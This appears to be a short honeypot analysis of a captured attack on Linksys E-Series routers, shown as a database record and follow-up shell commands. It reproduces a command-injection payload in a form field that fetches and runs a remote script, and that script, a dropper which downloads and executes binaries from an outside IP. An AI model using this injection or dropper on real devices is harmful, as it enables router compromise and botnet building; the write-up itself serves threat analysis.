Payload found to be unrelated to WordPress. Seems to be trying to build a botnet by exploiting Linksys E-Series routers
> db.payloads.find({'ip': '179.158.120.213'}).pretty()
{
"_id" : ObjectId("576a421f83932a00168098be"),
"Tor" : false,
"ip" : "179.158.120.213",
"user-agent" : "Wget(linux)",
"triggered_url" : "http://178.62.224.8/hndUnblock.cgi",
"time" : "1466581535",
"payload" : {
"data" : {
"ttcp_ip" : "-h `cd /tmp;rm -f ttp.sh;wget -O ttp.sh http://176.103.48.34:80/ttp.sh;chmod +x ttp.sh;./ttp.sh`",
"ttcp_size" : "2",
"StartEPI" : "1",
"change_action" : "",
"ttcp_num" : "2",
"submit_button" : "",
"action" : "",
"commit" : ""
},
"hash" : "063f0d9affbe842ddf2c9dc1ccc1ba630f14683b1901bd4e11e3e326bc30f5af"
}
}
The payload pulls a script that pulls down some malicious binaries:
root@780e7ade9793:/# curl -s http://176.103.48.34:80/ttp.sh
#!/bin/sh
cd /tmp
wget http://176.103.48.34/ttp/.nttpd
chmod +x .nttpd
./.nttpd
wget http://176.103.48.34/ttp/.sox
chmod +x .sox
./.sox
wget http://176.103.48.34/ttp/updok
root@780e7ade9793:/# curl -s http://176.103.48.34/ttp/.nttpd | strings | head
/lib/ld-uClibc.so.0
_fini
__uClibc_main
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
__deregister_frame_info
__register_frame_info
_Jv_RegisterClasses
strlen
strstr